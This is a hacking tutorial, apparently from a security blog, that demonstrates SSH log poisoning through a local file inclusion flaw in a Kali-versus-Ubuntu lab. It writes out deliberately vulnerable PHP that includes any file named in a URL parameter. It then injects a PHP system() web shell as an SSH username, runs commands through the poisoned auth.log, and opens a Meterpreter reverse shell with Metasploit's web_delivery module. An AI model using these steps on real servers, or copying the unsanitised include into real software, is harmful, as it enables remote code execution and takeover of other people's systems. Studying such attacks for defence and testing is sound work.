Sponsored

Hello readers, in this tutorial we will show you how we can perform ssh log Poisoning through local file inclusion vulnerability. But before start this we want to express important things about this attack.

What is Local File Inclusion ?

LFI ( Local File Inclusion ) is the type of web vulnerability that is commonly found in web application which can make a deep impact on web application. This vulnerability can lead many types of attacks such as :

  • Remote Code Execution (RCE)
  • Cross-site Scripting (XSS)
  • DDos Attack
  • Arbitrary Command Injection

Can Log Poisoning Possible Through LFI ?

Absolutely ! we can perform log poisoning through lfi vulnerability but with the help of some important factors such as :

  • Some ports must be enabled on the web server such as telnet ssh apache etc.
  • Error or log files must have special permissions.

Note : If special permissions has not be given on those files then you cannot take the meterpreter session of web server.

Requirements

Kali Linux = Attacker
Ubuntu = Victim

Now lets get started !! 🙂

Login in Ubuntu as “root” and create a directory on the given location.

cd /var/www/html/
mkdir vuln
cd vuln
leafpad lfi.php

Now we will insert the given configuration into the lfi.php file which will allow the user to include a file via a file parameter.

<?php
   $file = $_GET['file'];
   if(isset($file))
   {
       include("$file");
   }
   else
   {
       include("index.php");
   }
   ?>

Start the apache server using the following command.

systemctl start apache2

Now our server is vulnerable from lfi, Hence we can execute the system level commands on browser.

http://192.168.0.111/vuln/lfi.php?file=/etc/group

SSH Log Poisoning

Before starting we need to give some additional permission to the log file with the help of which other users can read log files from the đź‘Ą browser.

chmod 775 -R /var/log/auth.log

We will use the following command to continuously read the upcoming logs.

cd /var/log/
tail -f auth.log

Now we have to go back to the kali linux and check whether the ssh port is visible from the attacker’s side.

nmap 192.168.0.105

As we know the auth.log file generates a log in every success and failed login attempt. Now we will try to connect as fake users, which will contain malicious php code.
Usage 🙂 <- ssh code@vicitm IP Address ->

ssh '<?php system($_GET['c']); ?>'@192.168.0.111

Now you can see that the malicious PHP code has arrived in the log file.

Now we can take advantage of this vulnerability by execute the arbitrary command on browser such as

hostnamectl
uname -a
ls, dir, /etc/os-release
http://192.168.0.111/vuln/lfi.php?file=/var/log/auth.log&c=hostnamectl

Now lets try to take the meterpreter of the web server.

msf5 exploit(multi/handler) > use exploit/multi/script/web_delivery
msf5 exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
msf5 exploit(multi/script/web_delivery) > set lhost 192.168.0.105
msf5 exploit(multi/script/web_delivery) > set uripath /
msf5 exploit(multi/script/web_delivery) > run

Paste and execute the above highlighted php code on the browser as shown below.

Great !! 🙂 Our meterpreter is finally come to here.

About the Author
Shubham Goyal Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Connect on Linkedin and Twitter.
Sponsored

Recent Posts

Gau (GetAllUrls) – Find Known and Hidden URL

The gau (Get All URLs) tool is a versatile open-source utility that collects URLs from…

3 months ago

Jsluicepp – Burp Extension for JS Secrets – BugBountyTip

Jsluice++ is a Burp Suite extension designed for passive and active scanning of JavaScript traffic…

8 months ago

Bypassing Firewalls (WAF) with XSS Payloads

Hey Folks :) !! In this tutorial, we will describe some of the techniques commonly…

8 months ago

Termux Cheat Sheet for Hackers

Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…

1 year ago

Cracking the X-Factor in Cybersecurity: How Humans are Protecting the Systems?

Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…

2 years ago

Cariddi – Hidden Endpoint Finder for Bug Hunting

Hey Folks, we are back today after such a long break, but don't worry we…

3 years ago
Sponsored

This website uses cookies.